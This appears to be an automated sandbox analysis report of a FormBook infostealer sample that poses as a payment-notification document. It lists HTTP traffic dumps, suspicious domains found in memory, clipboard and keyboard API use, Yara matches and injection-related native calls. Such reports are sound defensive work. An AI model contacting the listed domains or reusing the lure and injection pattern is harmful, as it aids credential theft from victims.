2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:22:24 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 13 Jan 2025 09:22:27 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a

Source: vtTdsKSTqQr.exe, 00000007.00000002.4154787819.0000000004E8C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.u75lmwdgp0du.homes
Source: vtTdsKSTqQr.exe, 00000007.00000002.4154787819.0000000004E8C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.u75lmwdgp0du.homes/8m3y/
Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: w32tm.exe, 00000003.00000002.4153951411.0000000004DF2000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.0000000003892000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: w32tm.exe, 00000003.00000002.4152385313.0000000003346000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: w32tm.exe, 00000003.00000002.4152385313.0000000003346000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: w32tm.exe, 00000003.00000002.4152385313.0000000003346000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: w32tm.exe, 00000003.00000002.4152385313.000000000331F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033i
Source: w32tm.exe, 00000003.00000002.4152385313.0000000003346000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: w32tm.exe, 00000003.00000002.4152385313.000000000331F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: w32tm.exe, 00000003.00000003.2131601849.00000000081B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: w32tm.exe, 00000003.00000002.4153951411.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.000000000324A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ogbos88vip.click
Source: w32tm.exe, 00000003.00000002.4155927747.00000000081DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: w32tm.exe, 00000003.00000002.4153951411.00000000052A8000.00000004.10000000.00040000.00000000.sdmp, w32tm.exe, 00000003.00000002.4155777981.0000000006790000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 00000003.00000002.4153951411.0000000004486000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.0000000002F26000.00000004.00000001.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.0000000003D48000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253315519.00000000407D6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: w32tm.exe, 00000003.00000002.4153951411.0000000004ACE000.00000004.10000000.00040000.00000000.sdmp, vtTdsKSTqQr.exe, 00000007.00000002.4153236722.000000000356E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.myfastuploader.sbs/y3ui/?idTDev6P=D47F9HanQoviz063Kla

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_0095EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0095EAFF

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_0095ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0095ED6A

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

0_2_0095EAFF

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_0094AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0094AA57

Source: C:\Users\user\Desktop\Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Code function: 0_2_00979576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00979576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1892529323.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4152321363.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4152036800.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4153003564.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1892185335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4153026334.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1893024152.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000000.1693330333.00000000009A2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b93eb65e-2
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe, 00000000.00000000.1693330333.00000000009A2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_be247a93-b
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c9961171-c
Source: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_cc2d9611-8

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe
Source: initial sample	Static PE information: Filename: Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042CCE3 NtClose,	1_2_0042CCE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk,	1_2_036735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672B60 NtClose,LdrInitializeThunk,	1_2_03672B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03672DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03674340 NtSetContextThread,	1_2_03674340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03673010 NtOpenDirectoryObject,	1_2_03673010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03673090 NtSetValueKey,	1_2_03673090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03674650 NtSuspendThread,	1_2_03674650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672BE0 NtQueryValueKey,	1_2_03672BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672BF0 NtAllocateVirtualMemory,	1_2_03672BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672BA0 NtEnumerateValueKey,	1_2_03672BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672B80 NtQueryInformationFile,	1_2_03672B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672AF0 NtWriteFile,	1_2_03672AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672AD0 NtReadFile,	1_2_03672AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672AB0 NtWaitForSingleObject,	1_2_03672AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036739B0 NtGetContextThread,	1_2_036739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672F60 NtCreateProcessEx,	1_2_03672F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672F30 NtCreateSection,	1_2_03672F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672FE0 NtCreateFile,	1_2_03672FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672FA0 NtQuerySection,	1_2_03672FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672FB0 NtResumeThread,	1_2_03672FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672F90 NtProtectVirtualMemory,	1_2_03672F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672E30 NtWriteVirtualMemory,	1_2_03672E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672EE0 NtQueueApcThread,	1_2_03672EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672EA0 NtAdjustPrivilegesToken,	1_2_03672EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672E80 NtReadVirtualMemory,	1_2_03672E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03673D70 NtOpenThread,	1_2_03673D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672D30 NtUnmapViewOfSection,	1_2_03672D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672D00 NtSetInformationFile,	1_2_03672D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672D10 NtMapViewOfSection,	1_2_03672D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03673D10 NtOpenProcessToken,	1_2_03673D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672DD0 NtDelayExecution,	1_2_03672DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672DB0 NtEnumerateKey,	1_2_03672DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672C60 NtCreateKey,	1_2_03672C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672C70 NtFreeVirtualMemory,	1_2_03672C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672C00 NtQueryInformationProcess,	1_2_03672C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672CF0 NtOpenProcess,	1_2_03672CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672CC0 NtQueryVirtualMemory,	1_2_03672CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672CA0 NtQueryInformationToken,	1_2_03672CA0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03954340 NtSetContextThread,LdrInitializeThunk,	3_2_03954340
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03954650 NtSuspendThread,LdrInitializeThunk,	3_2_03954650
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952BA0 NtEnumerateValueKey,LdrInitializeThunk,	3_2_03952BA0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_03952BF0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952BE0 NtQueryValueKey,LdrInitializeThunk,	3_2_03952BE0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952B60 NtClose,LdrInitializeThunk,	3_2_03952B60
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952AD0 NtReadFile,LdrInitializeThunk,	3_2_03952AD0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952AF0 NtWriteFile,LdrInitializeThunk,	3_2_03952AF0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952FB0 NtResumeThread,LdrInitializeThunk,	3_2_03952FB0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952FE0 NtCreateFile,LdrInitializeThunk,	3_2_03952FE0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952F30 NtCreateSection,LdrInitializeThunk,	3_2_03952F30
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952E80 NtReadVirtualMemory,LdrInitializeThunk,	3_2_03952E80
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952EE0 NtQueueApcThread,LdrInitializeThunk,	3_2_03952EE0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952DD0 NtDelayExecution,LdrInitializeThunk,	3_2_03952DD0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_03952DF0
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952D10 NtMapViewOfSection,LdrInitializeThunk,	3_2_03952D10
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952D30 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_03952D30
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 3_2_03952CA0 NtQueryInformationToken,LdrInitializeThunk,	3_2_03952CA0
